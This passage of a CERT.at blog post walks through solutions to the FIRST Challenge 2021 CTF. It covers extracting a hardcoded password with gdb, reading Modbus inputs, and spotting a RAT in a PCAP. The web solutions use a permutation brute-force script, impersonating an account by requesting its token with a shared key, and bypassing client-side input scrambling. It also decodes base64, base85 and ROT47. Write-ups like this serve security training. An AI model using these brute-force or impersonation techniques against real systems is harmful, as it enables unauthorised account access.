   0x0000000000001e00 &amp;lt;+60&amp;gt;:    jne    0x1e30 &amp;lt;check_login+108&amp;gt;&#13;
   0x0000000000001e02 &amp;lt;+62&amp;gt;:    mov    -0x38(%rbp),%rax&#13;
   0x0000000000001e06 &amp;lt;+66&amp;gt;:    add    $0x10,%rax&#13;
   0x0000000000001e0a &amp;lt;+70&amp;gt;:    mov    $0x19,%edx&#13;
   0x0000000000001e0f &amp;lt;+75&amp;gt;:    lea    0x1322(%rip),%rsi        # 0x3138&#13;
   0x0000000000001e16 &amp;lt;+82&amp;gt;:    mov    %rax,%rdi&#13;
   0x0000000000001e19 &amp;lt;+85&amp;gt;:    callq  0xe30 &amp;lt;strncasecmp@plt&amp;gt;&#13;
[snip]&#13;
(gdb) x/s 0x312f&#13;
0x312f: &quot;engineer&quot;&#13;
(gdb) x/s 0x3138&#13;
0x3138: &quot;staplebatterycorrecthorse&quot;&lt;/code&gt;&lt;/pre&gt;&#13;
&lt;p&gt;In verbose: This function first compares its first parameter to the string &lt;code&gt;engineer&lt;/code&gt; and if this is the case it compares the second parameter to &lt;code&gt;staplebatterycorrecthorse&lt;/code&gt;. Since we know that the first parameter is the username, we can be pretty sure that the second one is the password which was correct.&lt;/p&gt;&#13;
&lt;h3 id=&quot;hiding-on-the-modbus---1&quot;&gt;Hiding on the Modbus - 1&lt;/h3&gt;&#13;
&lt;p&gt;The task was:&lt;/p&gt;&#13;
&lt;blockquote&gt;&#13;
&lt;p&gt;There is a modbus device located at &lt;code&gt;[redacted].firstseclounge.org&lt;/code&gt; on TCP port 5020.&lt;/p&gt;&#13;
&lt;p&gt;Can you find the ASCII string hidden in the discrete inputs?&lt;/p&gt;&#13;
&lt;/blockquote&gt;&#13;
&lt;p&gt;Unfortunately we didn&amp;rsquo;t document this challenge during the CTF and when we wrote the writeup we could reproduce our steps but as the modbus device was no longer active we couldn&amp;rsquo;t retrieve the flag again.&lt;/p&gt;&#13;
&lt;p&gt;We used the &lt;code&gt;modbus-cli&lt;/code&gt; interface and read all data from the discrete inputs:&lt;/p&gt;&#13;
&lt;pre&gt;&lt;code&gt;#!/bin/bash&#13;
for i in {1..90}&#13;
do&#13;
  modbus [redacted].firstseclounge.org:5020 d@{i} | tee -a out.txt&#13;
done&lt;/code&gt;&lt;/pre&gt;&#13;
&lt;p&gt;This resulted in a stream of ones and zeroes and decoding it as ASCII returned the flag.&lt;/p&gt;&#13;
&lt;h3 id=&quot;hiding-in-the-noise---1&quot;&gt;Hiding in the Noise - 1&lt;/h3&gt;&#13;
&lt;p&gt;We&amp;rsquo;re back to PCAPs here and have the following task:&lt;/p&gt;&#13;
&lt;blockquote&gt;&#13;
&lt;p&gt;The attached packet capture contains real BACnet traffic as well as BACnet traffic from a command-and-control (C2) server communicating with a remote access trojan (RAT).&lt;/p&gt;&#13;
&lt;p&gt;Can you determine the IP address of the RAT?&lt;/p&gt;&#13;
&lt;/blockquote&gt;&#13;
&lt;p&gt;We looked at the I/O graphs of the connections which where mainly in sync with deterministic spikes, except for one connection that had irregular bumps. Zeroing in on this connection, it turned out that one of the IP addresses involved sends malformed packets &amp;ndash; a clear sign that this was the RAT communicating with its C2-server. This IP address was &lt;code&gt;10.20.21.91&lt;/code&gt; and that was the correct answer.&lt;/p&gt;&#13;
&lt;h2 id=&quot;web&quot;&gt;Web&lt;/h2&gt;&#13;
&lt;p&gt;The web-part consisted of four challenges which we all solved.&lt;/p&gt;&#13;
&lt;h3 id=&quot;clear-intentions&quot;&gt;Clear Intentions&lt;/h3&gt;&#13;
&lt;p&gt;The description reads:&lt;/p&gt;&#13;
&lt;blockquote&gt;&#13;
&lt;p&gt;A website&amp;rsquo;s intentions aren&amp;rsquo;t always clear or at least not as obvious. Can you help us figure out what this site is doing? We&amp;rsquo;ll gladly pay bitc... I mea n, a challenge flag for your time&lt;/p&gt;&#13;
&lt;p&gt;&lt;strong&gt;A bit of background&lt;/strong&gt;&lt;/p&gt;&#13;
&lt;p&gt;Take a look at the site (https://[redacted].firstchallenges.ninja/clarity), follow the trail and see where it leads you. You can get past the front door with c ode [redacted]&lt;/p&gt;&#13;
&lt;/blockquote&gt;&#13;
&lt;p&gt;When connecting to the webpage, we were confronted with a login page which told us to urgently validate our account by typing in a username and a password. In the network traffic, we also noticed that the main part of the page is dynamically built by a javascript called &lt;code&gt;image.js&lt;/code&gt;. This contained a function called &lt;code&gt;xyzl&lt;/code&gt; with an interesting URL, i.e. &lt;code&gt;https://[redacted].firstchallenges.ninja/clarity/harvest&amp;rsquo;&lt;/code&gt; within another function called &lt;code&gt;postData&lt;/code&gt; which, to our surprise, posts data to this URL.&lt;/p&gt;&#13;
&lt;p&gt;Well, let&amp;rsquo;s try the most primitive thing &amp;ndash; a POST request:&lt;/p&gt;&#13;
&lt;pre&gt;&lt;code&gt;$ curl -X POST https://[redacted].firstchallenges.ninja/clarity/harvest&#13;
{&quot;flag&quot;: &quot;6ced11aa9bc1aeab98241abc3f7a3c84987786c7&quot;}&lt;/code&gt;&lt;/pre&gt;&#13;
&lt;p&gt;Oh, ehm, that was easier than expected :D&lt;/p&gt;&#13;
&lt;h3 id=&quot;permutation-lock&quot;&gt;Permutation Lock&lt;/h3&gt;&#13;
&lt;p&gt;Another website with the following task:&lt;/p&gt;&#13;
&lt;blockquote&gt;&#13;
&lt;p&gt;It appears that we&amp;rsquo;ve lost the key to this locked site. Can you help recover the right code?&lt;/p&gt;&#13;
&lt;p&gt;&lt;strong&gt;A bit of background&lt;/strong&gt;&lt;/p&gt;&#13;
&lt;p&gt;The locked site can be found at &lt;code&gt;https://[redacted].firstchallenges.ninja/order&lt;/code&gt;. You can get past the front door by entering FIRST2021&lt;/p&gt;&#13;
&lt;p&gt;On the next page you will find a list of available codes at the top and empty fields below that you need to place in the right order.&lt;/p&gt;&#13;
&lt;p&gt;You&amp;rsquo;ll need to enter the characters available in the empty fields in the right order before gaining access to the locked site.&lt;/p&gt;&#13;
&lt;p&gt;Once the right code order is entered you will be redirected to another page letting you know of your success and show you the challenge flag.&lt;/p&gt;&#13;
&lt;p&gt;You can test success page by entering test code [redacted] in the emtpy fields. There are over 5,000 possible permutations for this lock. Good luck!&lt;/p&gt;&#13;
&lt;/blockquote&gt;&#13;
&lt;p&gt;As &lt;a class=&quot;uri&quot; href=&quot;https://ctf.firstseclounge.org/&quot;&gt;https://ctf.firstseclounge.org/&lt;/a&gt; states&lt;/p&gt;&#13;
&lt;blockquote&gt;&#13;
&lt;p&gt;Any attempts at cheating, multiple registrations, brute force or other malicious actions against the challenge framework and corresponding infrastructure will result in immediate exclusion from the challenge for the offending team.&lt;/p&gt;&#13;
&lt;/blockquote&gt;&#13;
&lt;p&gt;we specifically asked whether it is allowed to just try all combinations or if this will be considered brute-force. We were told that in this case trying all combinations is acceptable.&lt;/p&gt;&#13;
&lt;p&gt;So we proceeded with our initial idea of just trying out stuff:&lt;/p&gt;&#13;
&lt;pre&gt;&lt;code&gt;import requests&#13;
import itertools&#13;
&#13;
reqs = requests.session()&#13;
access_code = {&#13;
   ('access_code', (None, 'FIRST2021')),&#13;
}&#13;
resp = reqs.post('https://[redacted].firstchallenges.ninja/order/default', files=access_code)&#13;
&#13;
seq = ['21', '2D', '2E', '41', '56', '58', '5F']&#13;
seq_perms = list(itertools.permutations(seq))&#13;
seq_max = len(seq_perms)&#13;
seq_curr = 0&#13;
&#13;
for perm in seq_perms:&#13;
   print(&quot;{}/{}&quot;.format(seq_curr, seq_max), sep='', end='\r', flush=True)&#13;
   seq_curr += 1&#13;
   data = {&#13;
       ('first', (None, perm[0])),&#13;
       ('second', (None, perm[1])),&#13;
       ('third', (None, perm[2])),&#13;
       ('fourth', (None, perm[3])),&#13;
       ('fifth', (None, perm[4])),&#13;
       ('sixth', (None, perm[5])),&#13;
       ('seventh', (None, perm[6])),&#13;
   }&#13;
   resp = reqs.post('https://[redacted].firstchallenges.ninja/order/orderme', files=data)&#13;
   if &quot;Not Valid&quot; in resp.text:&#13;
       continue&#13;
&#13;
   print(&quot;Possible answer found?: {}&quot;.format(perm))&lt;/code&gt;&lt;/pre&gt;&#13;
&lt;p&gt;Running the script returned the flag: &lt;code&gt;2E21582D415F56&lt;/code&gt;.&lt;/p&gt;&#13;
&lt;h3 id=&quot;time-to-rest&quot;&gt;Time to REST&lt;/h3&gt;&#13;
&lt;p&gt;The description read:&lt;/p&gt;&#13;
&lt;blockquote&gt;&#13;
&lt;p&gt;You will need to setup a method to interact with the REST api and understand the methods available to you. The API is avaiable on &lt;code&gt;https://[redacted].firstchallenges.ninja/accounts/default/fetchtoken&lt;/code&gt;, and the available endpoints are fetchtoken, whoami, who, flag. Unfortunately, guest accounts do not have access to the flag endpoint, so they won&amp;rsquo;t receive a response with a valid challenge flag. To ensure you aren&amp;rsquo;t interrupting another competitor, you can pick one of the seven guest accounts below.&lt;/p&gt;&#13;
&lt;p&gt;[redacted]&lt;/p&gt;&#13;
&lt;p&gt;Discussion&lt;/p&gt;&#13;
&lt;p&gt;With fetchtoken you&amp;rsquo;ll need to provide the id and key value pairs and it will respond a valid token that can be used to interact with the rest of the API.&lt;/p&gt;&#13;
&lt;p&gt;You can use whoami to verify the identity associated with your token. If you provide &amp;lsquo;token&amp;rsquo; with and a valid token string, it will respond with identity of the user associated with the token.&lt;/p&gt;&#13;
&lt;p&gt;The who endpoint accepts a token&amp;rsquo; key with valid token string value, it will respond with a data of the accounts with an active token on the system.&lt;/p&gt;&#13;
&lt;p&gt;Finally, calling the &amp;lsquo;flag&amp;rsquo; endpoint with a valid &amp;lsquo;token&amp;rsquo; and token string value might respond with a challenge flag. Guest accounts do not have access to a valid challenge flag, so they&amp;rsquo;ll receive a forbidden response value pair. If you access the flag endpoint with a more priviledge token, then you&amp;rsquo;ll get a real challenge flag.&lt;/p&gt;&#13;
&lt;/blockquote&gt;&#13;
&lt;p&gt;We started be grabbing a new token from &lt;code&gt;https://[redacted].firstchallenges.ninja/accounts/default/fetchtoken&lt;/code&gt; which returns an object of the form &lt;code&gt;{&quot;token&quot;: &quot;aaaaaaaaaaaaaaaaaaa-bbbbbbbbbbbbbb-ccccccccccccccccccc&quot;}&lt;/code&gt;:&lt;/p&gt;&#13;
&lt;pre&gt;&lt;code&gt;$ curl --location --request POST &quot;https://[redacted].firstchallenges.ninja/accounts/default/fetchtoken&quot; \&#13;
--header &quot;Content-Type: application/x-www-form-urlencoded&quot; \&#13;
--data-urlencode &quot;id=guest7&quot; \&#13;
--data-urlencode &quot;key=rdmCAbYtDD3rnEcPNngjP3Sp3Lft4GYc6nG3mDnq&quot;&#13;
{&quot;token&quot;: &quot;3230332e302e3131332e3432-677565737435-31363234303036373631&quot;}&lt;/code&gt;&lt;/pre&gt;&#13;
&lt;p&gt;The token contains hex encoded values, which contain:&lt;/p&gt;&#13;
&lt;ul&gt;&#13;
&lt;li&gt;&#13;
&lt;p&gt;&lt;code&gt;3230332e302e3131332e3432&lt;/code&gt; == &lt;code&gt;203.0.113.42&lt;/code&gt;, this contains our IPv4 address. In the output, we changed this value to an IPv4 address in the &lt;code&gt;203.0.113.0/24&lt;/code&gt; network which is reserved for documentation.&lt;/p&gt;&#13;
&lt;/li&gt;&#13;
&lt;li&gt;&#13;
&lt;p&gt;&lt;code&gt;677565737435&lt;/code&gt; == &lt;code&gt;guest5&lt;/code&gt;, i.e. our identity&lt;/p&gt;&#13;
&lt;/li&gt;&#13;
&lt;li&gt;&#13;
&lt;p&gt;&lt;code&gt;31363234303036373631&lt;/code&gt; == &lt;code&gt;1624006761&lt;/code&gt; which is a UNIX timestamp, in this case 2021-06-18T10:59:21+02:00 (we rerun the exercise while writing the documentation, so it&amp;rsquo;s after the challenge ended).&lt;/p&gt;&#13;
&lt;/li&gt;&#13;
&lt;/ul&gt;&#13;
&lt;p&gt;Using the token we received, we can ask who we are:&lt;/p&gt;&#13;
&lt;pre&gt;&lt;code&gt;$ curl --location --request POST &quot;https://[redacted].firstchallenges.ninja/accounts/default/whoami&quot; \&#13;
--header &quot;Content-Type: application/x-www-form-urlencoded&quot; \&#13;
--data-urlencode &quot;token=3230332e302e3131332e3432-677565737435-31363234303036373631&quot;&#13;
{&quot;identity&quot;: &quot;guest5&quot;}&lt;/code&gt;&lt;/pre&gt;&#13;
&lt;p&gt;This works as expected. Let&amp;rsquo;s see who else is on the system:&lt;/p&gt;&#13;
&lt;pre&gt;&lt;code&gt;$ curl --location --request POST &quot;https://[redacted].firstchallenges.ninja/accounts/default/who&quot; \&#13;
--header &quot;Content-Type: application/x-www-form-urlencoded&quot; \&#13;
--data-urlencode &quot;token=3230332e302e3131332e3432-677565737435-31363234303036373631&quot;&#13;
{&quot;guest&quot;: {&quot;logged&quot;: &quot;961 hours ago&quot;, &quot;remote&quot;: &quot;[redacted]&quot;,&#13;
&quot;identity&quot;: &quot;guest&quot;}, &quot;guest7&quot;: {&quot;logged&quot;: &quot;190 hours ago&quot;, &quot;remote&quot;:&#13;
&quot;[redacted]&quot;, &quot;identity&quot;: &quot;guest7&quot;}, &quot;Admin&quot;: {&quot;logged&quot;: &quot;231 hours&#13;
ago&quot;, &quot;remote&quot;: &quot;[redacted]&quot;, &quot;identity&quot;: &quot;Admin&quot;}, &quot;guest6&quot;:&#13;
{&quot;logged&quot;: &quot;235 hours ago&quot;, &quot;remote&quot;: &quot;[redacted]&quot;, &quot;identity&quot;:&#13;
&quot;guest6&quot;}, &quot;admin&quot;: {&quot;logged&quot;: &quot;200 hours ago&quot;, &quot;remote&quot;: &quot;[redacted]&quot;,&#13;
&quot;identity&quot;: &quot;admin&quot;}, &quot;guest4&quot;: {&quot;logged&quot;: &quot;234 hours ago&quot;, &quot;remote&quot;:&#13;
&quot;[redacted]&quot;, &quot;identity&quot;: &quot;guest4&quot;}, &quot;guest5&quot;: {&quot;logged&quot;: &quot;less than&#13;
1 hr&quot;, &quot;remote&quot;: &quot;[redacted]&quot;, &quot;identity&quot;: &quot;guest5&quot;}, &quot;guest2&quot;:&#13;
{&quot;logged&quot;: &quot;235 hours ago&quot;, &quot;remote&quot;: &quot;[redacted]&quot;, &quot;identity&quot;:&#13;
&quot;guest2&quot;}, &quot;guest3&quot;: {&quot;logged&quot;: &quot;189 hours ago&quot;, &quot;remote&quot;:&#13;
&quot;[redacted]&quot;, &quot;identity&quot;: &quot;guest3&quot;}, &quot;guest1&quot;: {&quot;logged&quot;: &quot;191 hours&#13;
ago&quot;, &quot;remote&quot;: &quot;[redacted]&quot;, &quot;identity&quot;: &quot;guest1&quot;}, &quot;first&quot;:&#13;
{&quot;logged&quot;: &quot;20 hours ago&quot;, &quot;remote&quot;: &quot;[redacted]&quot;, &quot;identity&quot;:&#13;
&quot;first&quot;}}&lt;/code&gt;&lt;/pre&gt;&#13;
&lt;p&gt;While we were told that guest accounts have no access to the flag, we still wanted to be sure:&lt;/p&gt;&#13;
&lt;pre&gt;&lt;code&gt;$ curl --location --request POST &quot;https://[redacted].firstchallenges.ninja/accounts/default/flag&quot; \&#13;
--header &quot;Content-Type: application/x-www-form-urlencoded&quot; \&#13;
--data-urlencode &quot;token=3230332e302e3131332e3432-677565737435-31363234303036373631&quot;&#13;
{&quot;forbidden&quot;: &quot;You do not have permission to access the flag.&quot;}&lt;/code&gt;&lt;/pre&gt;&#13;
&lt;p&gt;That was expected. Looking at the &lt;code&gt;who&lt;/code&gt; output again, we can see that besides guest accounts, there were also &lt;code&gt;Admin&lt;/code&gt;, &lt;code&gt;admin&lt;/code&gt;, and &lt;code&gt;first&lt;/code&gt; accounts active. As this is the FIRST CTF, we&amp;rsquo;ll try the &lt;code&gt;first&lt;/code&gt; account first. Just changing the account in the token to &lt;code&gt;6669727374&lt;/code&gt;, which is the hex-encoded value of &lt;code&gt;first&lt;/code&gt; doesn&amp;rsquo;t work, but this is expected as we assumed that the tokens are stored somewhere on the server as well.&lt;/p&gt;&#13;
&lt;p&gt;Hence, we tried to fetch a new token for the &lt;code&gt;first&lt;/code&gt; account, using the same key all the guest accounts used:&lt;/p&gt;&#13;
&lt;pre&gt;&lt;code&gt;$ curl --location --request POST &quot;https://[redacted].firstchallenges.ninja/accounts/default/fetchtoken&quot; \&#13;
&amp;gt; --header &quot;Content-Type: application/x-www-form-urlencoded&quot; \&#13;
&amp;gt; --data-urlencode &quot;id=first&quot; \&#13;
&amp;gt; --data-urlencode &quot;key=rdmCAbYtDD3rnEcPNngjP3Sp3Lft4GYc6nG3mDnq&quot;&#13;
{&quot;token&quot;: &quot;3230332e302e3131332e3432-6669727374-31363234303130383133&quot;}&lt;/code&gt;&lt;/pre&gt;&#13;
&lt;p&gt;That seemed to work, so let&amp;rsquo;s try to get the flag:&lt;/p&gt;&#13;
&lt;pre&gt;&lt;code&gt;$ curl --location --request POST &quot;https://[redacted].firstchallenges.ninja/accounts/default/flag&quot; \&#13;
--header &quot;Content-Type: application/x-www-form-urlencoded&quot; \&#13;
--data-urlencode &quot;token=3230332e302e3131332e3432-6669727374-31363234303130383133&quot;&#13;
{&quot;flag&quot;: &quot;92e7f5ed2e6933b47cc494d3eb4d0baf&quot;}&lt;/code&gt;&lt;/pre&gt;&#13;
&lt;p&gt;Great, that&amp;rsquo;s it :)&lt;/p&gt;&#13;
&lt;h3 id=&quot;intern-dev-tango&quot;&gt;Intern Dev Tango&lt;/h3&gt;&#13;
&lt;p&gt;A new task, a new URL:&lt;/p&gt;&#13;
&lt;blockquote&gt;&#13;
&lt;p&gt;Our new dev intern has completed their first assignment, can you help test it?&lt;/p&gt;&#13;
&lt;p&gt;&lt;strong&gt;A bit of background&lt;/strong&gt;&lt;/p&gt;&#13;
&lt;p&gt;The site is very simple, but we are trying to figure out the bugs. Once you find all the bugs we&amp;rsquo;ll reward you with a shiny challenge flag. You can find the new site at &lt;code&gt;https://[redacted].firstchallenges.ninja/tango&lt;/code&gt; and you can use the code FIRST2021 to get past the front door. Good luck!&lt;/p&gt;&#13;
&lt;/blockquote&gt;&#13;
&lt;p&gt;When visiting the site, we&amp;rsquo;re greeted with a question &amp;ldquo;Name a fun FIRST special interest group?&quot;. The answer is very likely&amp;rdquo;seclounge-sig&quot;, but when we try to put it in, the letters are completely scrambled. The HTML looks like this:&lt;/p&gt;&#13;
&lt;pre&gt;&lt;code&gt;&#13;
&amp;lt;html&amp;gt;&#13;
  &amp;lt;body&amp;gt;&#13;
    &amp;lt;head&amp;gt;&#13;
        &amp;lt;meta charset=&quot;utf-8&quot;&amp;gt;&#13;
        &amp;lt;title&amp;gt;Tango&amp;lt;/title&amp;gt;&#13;
        &amp;lt;script type=&quot;module&quot; src=&quot;https://www.cert.at/tango/static/js/question.js&quot;&amp;gt;&amp;lt;/script&amp;gt;&#13;
    &amp;lt;/head&amp;gt;&#13;
    &amp;lt;main class=&quot;maincontent&quot;&amp;gt;&#13;
      &amp;lt;p classname=&quot;inputlabel&quot;&amp;gt;Name of a fun FIRST special interest group?&amp;lt;/p&amp;gt;&#13;
      &amp;lt;form class=&quot;inputform&quot; enctype=&quot;multipart/form-data&quot; action=&quot;/tango/question&quot; method=&quot;post&quot;&amp;gt;&#13;
        &amp;lt;input class=&quot;inputfield&quot; type=&quot;text&quot; id=&quot;code&quot; name=&quot;code&quot; placeholder=&quot;#########-###&quot; maxlength=&quot;15&quot;&amp;gt;&#13;
        &amp;lt;button class=&quot;submitbutton&quot; type=&quot;submit&quot;&amp;gt;Submit&amp;lt;/button&amp;gt;&#13;
      &amp;lt;/form&amp;gt;&#13;
    &amp;lt;/main&amp;gt;&#13;
  &amp;lt;/body&amp;gt;   &#13;
  &amp;lt;footer class=&quot;pagefooter&quot;&amp;gt;&#13;
              &#13;
  &amp;lt;/footer&amp;gt;&#13;
&amp;lt;/html&amp;gt;&#13;
&lt;/code&gt;&lt;/pre&gt;&#13;
&lt;p&gt;Let&amp;rsquo;s check what &lt;code&gt;question.js&lt;/code&gt; is doing, as this is the most likely culprit for the scrambling:&lt;/p&gt;&#13;
&lt;pre&gt;&lt;code&gt;function getrando(){&#13;
  let mc = [];&#13;
  for(let i=65; i&amp;lt;91; ++i){&#13;
    mc.push(String.fromCharCode(i))&#13;
  }&#13;
&#13;
  for(let i=97; i&amp;lt;123; ++i){&#13;
    mc.push(String.fromCharCode(i))&#13;
  }&#13;
&#13;
  let randoIndex = Math.floor(Math.random() * mc.length);&#13;
&#13;
  return mc[randoIndex]&#13;
}&#13;
&#13;
&#13;
function bechanged(){&#13;
&#13;
  let fin = &quot;&quot;;&#13;
  for(let i=0; i&amp;lt;9; ++i){&#13;
    fin += getrando();&#13;
  }&#13;
&#13;
  fin += &quot;-&quot;&#13;
&#13;
  for(let i=0; i&amp;lt;3; ++i){&#13;
    fin += getrando();&#13;
  }&#13;
&#13;
  let orig = document.querySelector(&quot;.maincontent .inputform .inputfield&quot;);&#13;
  orig.value=fin;&#13;
}&#13;
&#13;
let tchnge = document.querySelector(&quot;.maincontent .inputform .inputfield&quot;);&#13;
tchnge.addEventListener(&quot;keyup&quot;, bechanged, false);&lt;/code&gt;&lt;/pre&gt;&#13;
&lt;p&gt;Well, okay, that explains things :D We fired up ZAP and looked at the request:&lt;/p&gt;&#13;
&lt;pre&gt;&lt;code&gt;POST https://[redacted].firstchallenges.ninja/tango/question HTTP/1.1&#13;
User-Agent: [redacted]&#13;
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8&#13;
Accept-Language: en-US,en;q=0.5&#13;
Content-Type: multipart/form-data; boundary=---------------------------4660448215033997732555194938&#13;
Content-Length: 182&#13;
Origin: https://[redacted].firstchallenges.ninja&#13;
Connection: keep-alive&#13;
Referer: https://[redacted].firstchallenges.ninja/tango/question&#13;
Cookie: session_id_tango=[redacted]&#13;
Upgrade-Insecure-Requests: 1&#13;
Host: [redacted].firstchallenges.ninja&#13;
&#13;
-----------------------------4660448215033997732555194938&#13;
Content-Disposition: form-data; name=&quot;code&quot;&#13;
&#13;
UzDjBDxSu-twr&#13;
-----------------------------4660448215033997732555194938--&lt;/code&gt;&lt;/pre&gt;&#13;
&lt;p&gt;So, we changed it to&lt;/p&gt;&#13;
&lt;pre&gt;&lt;code&gt;POST https://[redacted].firstchallenges.ninja/tango/question HTTP/1.1&#13;
User-Agent: [redacted]&#13;
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8&#13;
Accept-Language: en-US,en;q=0.5&#13;
Content-Type: multipart/form-data; boundary=---------------------------4660448215033997732555194938&#13;
Content-Length: 182&#13;
Origin: https://[redacted].firstchallenges.ninja&#13;
Connection: keep-alive&#13;
Referer: https://[redacted].firstchallenges.ninja/tango/question&#13;
Cookie: session_id_tango=[redacted]&#13;
Upgrade-Insecure-Requests: 1&#13;
Host: [redacted].firstchallenges.ninja&#13;
&#13;
-----------------------------4660448215033997732555194938&#13;
Content-Disposition: form-data; name=&quot;code&quot;&#13;
&#13;
seclounge-sig&#13;
-----------------------------4660448215033997732555194938--&lt;/code&gt;&lt;/pre&gt;&#13;
&lt;p&gt;and resent it. The HTML response said:&lt;/p&gt;&#13;
&lt;pre&gt;&lt;code&gt;&#13;
&amp;lt;html&amp;gt;&#13;
  &amp;lt;body&amp;gt;&amp;lt;script src=&quot;https://[redacted].firstchallenges.ninja/zapCallBackUrl/-6222965360475529933/inject.js&quot;&amp;gt;&amp;lt;/script&amp;gt;&#13;
&#13;
    &amp;lt;head&amp;gt;&#13;
        &amp;lt;meta charset=&quot;utf-8&quot;&amp;gt;&#13;
        &amp;lt;title&amp;gt;Tango&amp;lt;/title&amp;gt;&#13;
    &amp;lt;/head&amp;gt;&#13;
    &amp;lt;main class=&quot;maincontent&quot;&amp;gt;&#13;
      &amp;lt;h2 class=&quot;headinglabel&quot;&amp;gt;HERE IS YOUR CHALLENGE FLAG&amp;lt;/h&amp;gt;&#13;
        &amp;lt;div class=&quot;minstyle&quot;&amp;gt;&#13;
          &amp;lt;div class=&quot;sumting&quot;&amp;gt;&#13;
            &amp;lt;div class=&quot;tis&quot;&amp;gt;&#13;
              &amp;lt;div class=&quot;buried&quot;&amp;gt;&#13;
                &amp;lt;div class=&quot;there&quot;&amp;gt;&#13;
                  &amp;lt;p class=incontents&amp;gt;339636a5b9df27dd15704828f5c10037e8334099&amp;lt;/p&amp;gt;&#13;
                &amp;lt;/div&amp;gt;&#13;
              &amp;lt;/div&amp;gt;&#13;
            &amp;lt;/div&amp;gt;&#13;
          &amp;lt;/div&amp;gt;&#13;
        &amp;lt;/div&amp;gt;&#13;
    &amp;lt;/main&amp;gt;&#13;
  &amp;lt;/body&amp;gt;&#13;
&amp;lt;/html&amp;gt;&#13;
&lt;/code&gt;&lt;/pre&gt;&#13;
&lt;p&gt;And there we go \o/&lt;/p&gt;&#13;
&lt;h2 id=&quot;cryptography&quot;&gt;Cryptography&lt;/h2&gt;&#13;
&lt;p&gt;This section contained three challenges which we all solved. It was a bit disappointing, as it was not really about crypto but just about encodings.&lt;/p&gt;&#13;
&lt;h3 id=&quot;decode&quot;&gt;Decode&lt;/h3&gt;&#13;
&lt;p&gt;Task:&lt;/p&gt;&#13;
&lt;blockquote&gt;&#13;
&lt;p&gt;Decode:&lt;/p&gt;&#13;
&lt;p&gt;&lt;code&gt;VGhlIGZsYWcgZm9yIHRoaXMgY2hhbGxlbmdlcyBpczogV0x1Qklkd09qN2tzV05neVZuemhOVkphSmdUdXc0SUUK&lt;/code&gt;&lt;/p&gt;&#13;
&lt;/blockquote&gt;&#13;
&lt;p&gt;Well,&lt;/p&gt;&#13;
&lt;pre&gt;&lt;code&gt;$ echo &quot;VGhlIGZsYWcgZm9yIHRoaXMgY2hhbGxlbmdlcyBpczogV0x1Qklkd09qN2tzV05neVZuemhOVkphSmdUdXc0SUUK&quot; | base64 -d&#13;
The flag for this challenges is: WLuBIdwOj7ksWNgyVnzhNVJaJgTuw4IE&lt;/code&gt;&lt;/pre&gt;&#13;
&lt;h3 id=&quot;decode-2&quot;&gt;Decode 2&lt;/h3&gt;&#13;
&lt;p&gt;Task:&lt;/p&gt;&#13;
&lt;blockquote&gt;&#13;
&lt;p&gt;&lt;code&gt;&amp;lt;~&amp;lt;+ohcAo(mg+D,P4+EV:2F!+t+@;KakDJ*N&amp;rsquo;Blc&amp;lt;XE&amp;lsquo;&amp;gt;&quot;c8nW-:=&amp;amp;hV$C,g&amp;amp;fAp$l8nt78nULN7osSM$3~&amp;gt;&lt;/code&gt;&lt;/p&gt;&#13;
&lt;/blockquote&gt;&#13;
&lt;p&gt;As we had no &lt;code&gt;base85&lt;/code&gt; utilities installed per default on our machines, we just used &lt;a href=&quot;https://github.com/gchq/cyberchef&quot;&gt;CyberChef&lt;/a&gt; and got:&lt;/p&gt;&#13;
&lt;pre&gt;&lt;code&gt;The flag for this challenge is: rT8CJgqKWUChj8m5fu96JhNjJgC8GWnt&lt;/code&gt;&lt;/pre&gt;&#13;
&lt;h3 id=&quot;decode-3&quot;&gt;Decode 3&lt;/h3&gt;&#13;
&lt;p&gt;Task:&lt;/p&gt;&#13;
&lt;blockquote&gt;&#13;
&lt;p&gt;%96 7=28 7@C E9:D 492==6?86 :Di E?K_#8?F!wxss8AI&amp;rsquo;$GAv4wx)zp&amp;gt;K!r_&lt;/p&gt;&#13;
&lt;/blockquote&gt;&#13;
&lt;p&gt;Luckily, we didn&amp;rsquo;t have to search long for this, as one of us recently had to write encoding and decoding for ROT47 and immediately recognized the pattern, so we again turned to CyberChef to get the flag:&lt;/p&gt;&#13;
&lt;pre&gt;&lt;code&gt;The flag for this challenge is: tnz0RgnuPHIDDgpxVSvpGcHIXKAmzPC0&lt;/code&gt;&lt;/pre&gt;&#13;
&lt;section class=&quot;footnotes&quot;&gt;&lt;hr /&gt;&#13;
&lt;ol&gt;&#13;
&lt;li id=&quot;fn1&quot;&gt;&#13;
&lt;p&gt;The &lt;code&gt;_&lt;/code&gt; characters seem to be &lt;code&gt;oledump.py&lt;/code&gt;&amp;rsquo;s way of indicating a linebreak.&lt;a class=&quot;footnote-back&quot; href=&quot;#fnref1&quot;&gt;↩&lt;/a&gt;&lt;/p&gt;&#13;
&lt;/li&gt;&#13;
&lt;/ol&gt;&#13;
&lt;/section&gt;&#13;
&lt;hr /&gt;&#13;
&lt;p class=&quot;block&quot;&gt;This blog post is part of a series of blog posts related to our&amp;nbsp;&lt;a href=&quot;https://ec.europa.eu/inea/en/connecting-europe-facility/cef-telecom/2018-at-ia-0111&quot;&gt;CEF Telecom 2018-AT-IA-0111&lt;/a&gt; project, which also supports our participation in the CSIRTs Network.&lt;/p&gt;&#13;
&lt;p class=&quot;block&quot;&gt;&lt;img src=&quot;https://www.cert.at/media/files/news/blog/202002051545/en_cef-1024x146.png&quot; alt=&quot;Co-financed by the European Union Connecting Europe Facility&quot; width=&quot;1024&quot; height=&quot;146&quot; /&gt;&lt;/p&gt;</description><pubDate>Wed, 30 Jun 2021 05:50:30 GMT+0100</pubDate><guid>https://www.cert.at/en/blog/2021/6/first-challenge-2021-writeup</guid><dc:creator>CERT.at</dc:creator><dc:date>2021-06-30T05:50:30Z</dc:date></item><item><title>IntelMQ release 2.3.3 with support for new Shadowserver feeds</title><link>https://www.cert.at/en/blog/2021/5/intelmq-release-233-with-support-for-new-shadowserver-feeds</link><description>&lt;p class=&quot;block&quot;&gt;While the development of the next major version 3.0.0 of IntelMQ is in the final spurt, we released a small maintenance version of IntelMQ: version 2.3.3. It marks the end of the 2.x development cycle and is an important milestone of our project &lt;a href=&quot;https://www.cert.at/en/about-us/projects/current#3-4-1-3&quot;&gt;&amp;ldquo;Enhancing Cybersecurity in Austria&amp;rdquo; (2018-AT-IA-0111)&lt;/a&gt;.&lt;/p&gt;&#13;
